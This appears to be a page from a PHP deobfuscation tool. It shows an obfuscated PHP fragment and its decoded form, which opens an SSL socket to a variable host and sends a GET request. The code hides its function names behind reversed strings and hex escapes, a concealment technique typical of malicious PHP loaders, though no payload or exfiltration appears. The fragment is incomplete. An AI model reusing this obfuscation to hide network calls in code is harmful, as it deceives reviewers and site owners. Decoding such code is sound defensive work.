Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$fp = $this->naked($this->rev("//:lss").$host, 443, $errno, $errstr, 30); if ..

Decoded Output download

<?  $fp = $this->naked($this->rev("//:lss").$host, 443, $errno, $errstr, 30); 
            if (!$fp) { 
                echo "$errstr ($errno)<br />
"; 
            } else { 
                $out = "GET " . $path . " HTTP/1.1
"; 
                $out .= "Host: " . $host . "
"; 
                $out .= "Connection: Close

"; 
                $bam4($fp, $out); 
                $bb = $this->rev("foef"); 
                $cc = $this->rev("stegf"); 
                $dd = $this->rev("esolcf"); 
                while (!$bb($fp)) { 
                    $line = $cc($fp, 1024); 
                    if (trim($line) == '') { 
                        break; 
                    } 
            } ?>

Did this file decode correctly?

Original Code

$fp = $this->naked($this->rev("//:lss").$host, 443, $errno, $errstr, 30);
            if (!$fp) {
                echo "$errstr\x20\x28$errno\x29\x3C\x62\x72\x20\x2F\x3E\n";
            } else {
                $out = "\x47\x45\x54\x20" . $path . "\x20\x48\x54\x54\x50\x2F\x31\x2E\x31\r\n";
                $out .= "\x48\x6F\x73\x74\x3A\x20" . $host . "\r\n";
                $out .= "\x43\x6F\x6E\x6E\x65\x63\x74\x69\x6F\x6E\x3A\x20\x43\x6C\x6F\x73\x65\r\n\r\n";
                $bam4($fp, $out);
                $bb = $this->rev("foef");
                $cc = $this->rev("stegf");
                $dd = $this->rev("esolcf");
                while (!$bb($fp)) {
                    $line = $cc($fp, 1024);
                    if (trim($line) == '') {
                        break;
                    }
            }

Function Calls

None

Variables

None

Stats

MD5 f62f58f3573ffa07c1391f9e835b4b21
Eval Count 0
Decode Time 39 ms